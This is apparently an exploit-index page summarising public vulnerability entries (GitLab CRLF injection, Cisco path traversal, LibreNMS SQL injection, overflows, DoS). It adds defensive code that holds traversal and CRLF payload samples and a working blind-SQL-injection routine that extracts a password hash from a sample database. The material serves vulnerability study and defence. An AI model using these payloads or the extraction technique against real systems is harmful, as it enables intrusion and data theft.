Exploitdb Exploits
4,724 exploits tracked across all sources.
GitLab CE/EE <11.3.11-11.5.1 - CRLF Injection
GitLab CE/EE versions 8.18 up to 11.x before 11.3.11, 11.4.x before 11.4.8, and 11.5.x before 11.5.1 have CRLF Injection in Project Mirroring when using the Git protocol.
by Norbert Hofmann
CVSS 7.5
10-Strike Network Inventory Explorer Pro 9.05 - Buffer Overflow (SEH)
by Florian Gassner
SyncBreeze 10.0.28 - DoS
SyncBreeze 10.0.28 contains a denial of service vulnerability in the login endpoint that allows remote attackers to crash the service. Sending an oversized payload in the login request crashes the application and disrupts service availability.
by Ahmed Elkhressy
CVSS 7.5
Dolibarr ERP-CRM 12.0.3 - Remote Code Execution (Authenticated)
by Yilmaz Degirmenci
Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (2)
by Andrea Bruschi
Cisco ASA/FTD - Path Traversal
A vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.
by Freakyclown
CVSS 7.5
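The Cisco advisory above describes the bug class (traversal sequences in HTTP request URLs that are not validated before file lookup) without naming a URL. The following added example, which is not Cisco's code or part of the original listing, is a detector a responder could run over proxy or access-log request lines: it percent-decodes repeatedly (so single-, double- and triple-encoded `..` sequences are all caught), normalises backslashes, and reports whether the decoded path climbs above the web root. The sample request lines are constructed for the example, not taken from a real ASA/FTD device.

```python
from urllib.parse import unquote

# Constructed sample request lines (made up for this example, not real ASA/FTD logs).
SAMPLE_REQUESTS = [
    "GET /webvpn/index.html HTTP/1.1",
    "GET /images/../../../etc/passwd HTTP/1.1",
    "GET /%2e%2e/%2e%2e/config HTTP/1.1",
    "GET /static/%252e%252e%252f%252e%252e%252fsecrets HTTP/1.1",
    "GET /a/../b.html HTTP/1.1",
]


def decode_fully(raw, max_rounds=3):
    """Percent-decode repeatedly so that %252e -> %2e -> '.' is resolved."""
    current = raw
    for _ in range(max_rounds):
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    return current


def path_segments(path):
    """Split a path into segments, dropping any query string and treating '\\' as '/'."""
    path = path.split("?", 1)[0].replace("\\", "/")
    return path.split("/")


def escapes_root(segments):
    """True if walking the segments ever climbs above the root directory."""
    depth = 0
    for seg in segments:
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False


def analyse_request_line(line):
    """Classify one 'METHOD path HTTP/x' request line."""
    parts = line.split()
    if len(parts) < 2:
        return {"line": line, "decoded_path": "", "has_dotdot": False,
                "encoded_traversal": False, "escapes_root": False}
    raw_path = parts[1]
    decoded = decode_fully(raw_path)
    segments = path_segments(decoded)
    has_dotdot = ".." in segments
    return {
        "line": line,
        "decoded_path": decoded,
        "has_dotdot": has_dotdot,
        # '..' only appeared after decoding: an encoding-evasion attempt
        "encoded_traversal": has_dotdot and ".." not in path_segments(raw_path),
        "escapes_root": escapes_root(segments),
    }


def scan_requests(lines):
    """Return the analyses of every request whose decoded path escapes the root."""
    return [r for r in map(analyse_request_line, lines) if r["escapes_root"]]


if __name__ == "__main__":
    for hit in scan_requests(SAMPLE_REQUESTS):
        print(hit["line"], "->", hit["decoded_path"], "(encoded)" if hit["encoded_traversal"] else "")
```

A `..` that stays inside the root (the last sample line) is reported in `has_dotdot` but not in `escapes_root`; whether to alert on it is a tuning decision, since legitimate clients rarely send it but it reads no file outside the served tree.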
LibreNMS 1.46 - Authenticated SQL Injection
LibreNMS 1.46 contains an authenticated SQL injection vulnerability in the MAC accounting graph endpoint that allows remote attackers to extract database information. The attacker-controlled 'sort' parameter reaches the query unsanitised, so crafted values injected through it can be used as a time-based blind SQL injection oracle to retrieve sensitive database contents.
by Hodorsec
CVSS 7.1
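A 'sort' parameter is the classic case where bound parameters cannot help, because a column name or expression is not a value that a placeholder can carry. The following added example, which is not LibreNMS code and uses a constructed schema and sample rows rather than the project's real tables, shows the vulnerable pattern (user input concatenated into ORDER BY) beside the allowlist fix, and then uses the vulnerable path as a blind oracle to recover a stored hash one character at a time. SQLite has no SLEEP(), so the oracle here is the resulting sort order rather than response time; the injection point and the fix are the same as for the time-based variant the entry describes.

```python
import sqlite3

# Allowlist mapping user-facing sort keys to real column names (the hardened path).
SORT_COLUMNS = {"port": "port", "in": "bytes_in", "out": "bytes_out"}


def setup_db():
    """In-memory SQLite database with constructed sample data (not LibreNMS's schema)."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE mac_accounting (port TEXT, bytes_in INTEGER, bytes_out INTEGER);
        INSERT INTO mac_accounting VALUES ('Gi0/1', 100, 900), ('Gi0/2', 500, 400), ('Gi0/3', 300, 100);
        CREATE TABLE users (username TEXT, password_hash TEXT);
        INSERT INTO users VALUES ('admin', 'a1b2');
        """
    )
    return con


def graph_rows_vulnerable(con, sort):
    """Vulnerable: the 'sort' value is concatenated straight into ORDER BY."""
    return con.execute(f"SELECT port, bytes_in FROM mac_accounting ORDER BY {sort}").fetchall()


def graph_rows_hardened(con, sort, direction="asc"):
    """Hardened: only allowlisted column names and directions ever reach the query text."""
    column = SORT_COLUMNS.get(sort)
    if column is None or direction not in ("asc", "desc"):
        raise ValueError(f"unsupported sort parameter: {sort!r}")
    return con.execute(
        f"SELECT port, bytes_in FROM mac_accounting ORDER BY {column} {direction}"
    ).fetchall()


def hardened_rejects(con, sort):
    """True if the hardened endpoint refuses the given sort value."""
    try:
        graph_rows_hardened(con, sort)
    except ValueError:
        return True
    return False


def oracle(con, condition):
    """Boolean oracle through the sort order of the vulnerable endpoint:
    condition true  -> ORDER BY bytes_in  (ascending, Gi0/1 with 100 comes first)
    condition false -> ORDER BY -bytes_in (descending, Gi0/2 with 500 comes first)."""
    payload = f"(CASE WHEN ({condition}) THEN bytes_in ELSE -bytes_in END)"
    first_port = graph_rows_vulnerable(con, payload)[0][0]
    return first_port == "Gi0/1"


def extract_admin_hash(con, max_len=16):
    """Recover users.password_hash for 'admin' one character at a time via the oracle."""
    alphabet = "0123456789abcdef"  # hash alphabet assumed for the sample data
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            cond = (f"substr((SELECT password_hash FROM users WHERE username='admin'),"
                    f"{pos},1)='{ch}'")
            if oracle(con, cond):
                recovered += ch
                break
        else:
            break  # no character matched at this position: end of the string
    return recovered


if __name__ == "__main__":
    db = setup_db()
    print("hardened endpoint rejects payload:", hardened_rejects(db, "(CASE WHEN 1=1 THEN 1 ELSE 2 END)"))
    print("hash recovered through vulnerable endpoint:", extract_admin_hash(db))
```

The fix is an allowlist rather than escaping: there is no quoting rule that makes an arbitrary string safe inside ORDER BY, so the only robust approach is to map the request value onto a fixed set of column names chosen by the application.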
MiniWeb HTTP server 0.8.19 - DoS
MiniWeb HTTP server 0.8.19 allows remote attackers to cause a denial of service (daemon crash) via a long name for the first parameter in a POST request.
by securityforeveryone.com
CVSS 7.5
GitLab CE/EE <11.3.11-11.5.1 - CRLF Injection
GitLab CE/EE versions 8.18 up to 11.x before 11.3.11, 11.4.x before 11.4.8, and 11.5.x before 11.5.1 have CRLF Injection in Project Mirroring when using the Git protocol.
by Fortunato Lodari
CVSS 7.5
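Both GitLab CRLF entries above describe the same defect: a project mirror URL carrying carriage-return/line-feed characters that are not rejected before the URL is used over the Git protocol. The following added example is not GitLab's code; it is a validator a practitioner could put in front of any feature that passes a user-supplied repository URL to a line- or record-oriented protocol. It rejects CR, LF and NUL whether they appear literally or percent-encoded, and it checks the raw string before parsing because recent Python versions of `urlsplit` silently strip `\r` and `\n` from the input, so a check done only on the parsed components would miss a literal CRLF. The allowed scheme set is an assumption for the example.

```python
from urllib.parse import urlsplit, unquote

# Schemes a mirror is allowed to use (assumed for this example).
ALLOWED_SCHEMES = {"git", "ssh", "http", "https"}
CONTROL_CHARS = set("\r\n\x00")


def validate_mirror_url(url):
    """Return (ok, reason). Rejects CR/LF/NUL whether literal or percent-encoded."""
    # 1. Check the raw string first: urlsplit() drops '\r' and '\n' before parsing,
    #    so a literal CRLF would otherwise vanish from every parsed component.
    if CONTROL_CHARS & set(url):
        return False, "control character in raw URL"
    try:
        parts = urlsplit(url)
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if not parts.hostname:
        return False, "missing host"
    # 2. Check each component after percent-decoding, since %0d%0a becomes a real
    #    CRLF once the URL is decoded and written into a protocol request.
    components = (
        ("userinfo", parts.username or ""),
        ("host", parts.hostname),
        ("path", parts.path),
        ("query", parts.query),
    )
    for name, component in components:
        if CONTROL_CHARS & set(unquote(component)):
            return False, f"control character after decoding {name}"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample inputs for the example, not real mirror URLs.
    for candidate in (
        "git://mirror.example.com/group/repo.git",
        "git://mirror.example.com/repo.git\r\nhost=evil.example",
        "git://mirror.example.com/repo.git%0d%0ahost=evil.example",
        "file:///etc/passwd",
    ):
        print(repr(candidate), "->", validate_mirror_url(candidate))
```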
Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation
by Maximilian Barz
Flexense DupScout Enterprise 10.0.18 - Buffer Overflow
A buffer overflow in the web server of Flexense DupScout Enterprise 10.0.18 allows a remote anonymous attacker to execute code as SYSTEM by overflowing the sid parameter via a GET /settings&sid= attack.
by Andrés Roldán
CVSS 9.8
SmarterTools SmarterMail less than build 6985 - .NET Deserialization Remote Code Execution
SmarterTools SmarterMail 16.x before build 6985 allows deserialization of untrusted data. An unauthenticated attacker could run commands on the server when port 17001 was remotely accessible. This port is not accessible remotely by default after applying the Build 6985 patch.
by 1F98D
CVSS 9.8
Dup Scout Enterprise 10.0.18 - 'online_registration' Remote Buffer Overflow
by 0rbz_
Online Matrimonial Project 1.0 - Authenticated Remote Code Execution
by Valerio Alessandroni
WonderCMS 3.1.3 - SSRF
A server-side request forgery (SSRF) vulnerability in the addCustomThemePluginRepository function in index.php in WonderCMS 3.1.3 allows remote attackers to execute arbitrary code via a crafted URL to the theme/plugin installer.
by zetc0de
CVSS 9.8
WonderCMS 3.1.3 - OS Command Injection
A remote code execution vulnerability in the installUpdateThemePluginAction function in index.php in WonderCMS 3.1.3, allows remote attackers to upload a custom plugin which can contain arbitrary code and obtain a webshell via the theme/plugin installer.
by zetc0de
CVSS 9.8
10-Strike Network Inventory Explorer <8.65 - RCE
10-Strike Network Inventory Explorer 8.65 contains a buffer overflow that overwrites a Structured Exception Handler (SEH) record, allowing remote attackers to execute arbitrary code. A crafted file with 209 bytes of padding followed by a specially constructed SEH overwrite triggers code execution when the application processes it.
by Sectechs
CVSS 9.8
WordPress EventON <3.0.5 - XSS
The EventON plugin through 3.0.5 for WordPress allows addons/?q= XSS via the search field.
by B3KC4T
CVSS 6.1
Pharmacy/Medical Store & Sale Point 1.0 - 'email' SQL Injection
by naivenom
Setelsa Conacwin 3.7.1.2 - Local File Inclusion
by Bryan Rodriguez Martin
YATinyWinFTP - DoS
YATinyWinFTP contains a denial of service vulnerability that allows attackers to crash the FTP service. An attacker who connects and sends a malformed command consisting of a 272-byte buffer followed by a trailing space triggers a buffer overflow that crashes the service.
by strider
CVSS 9.8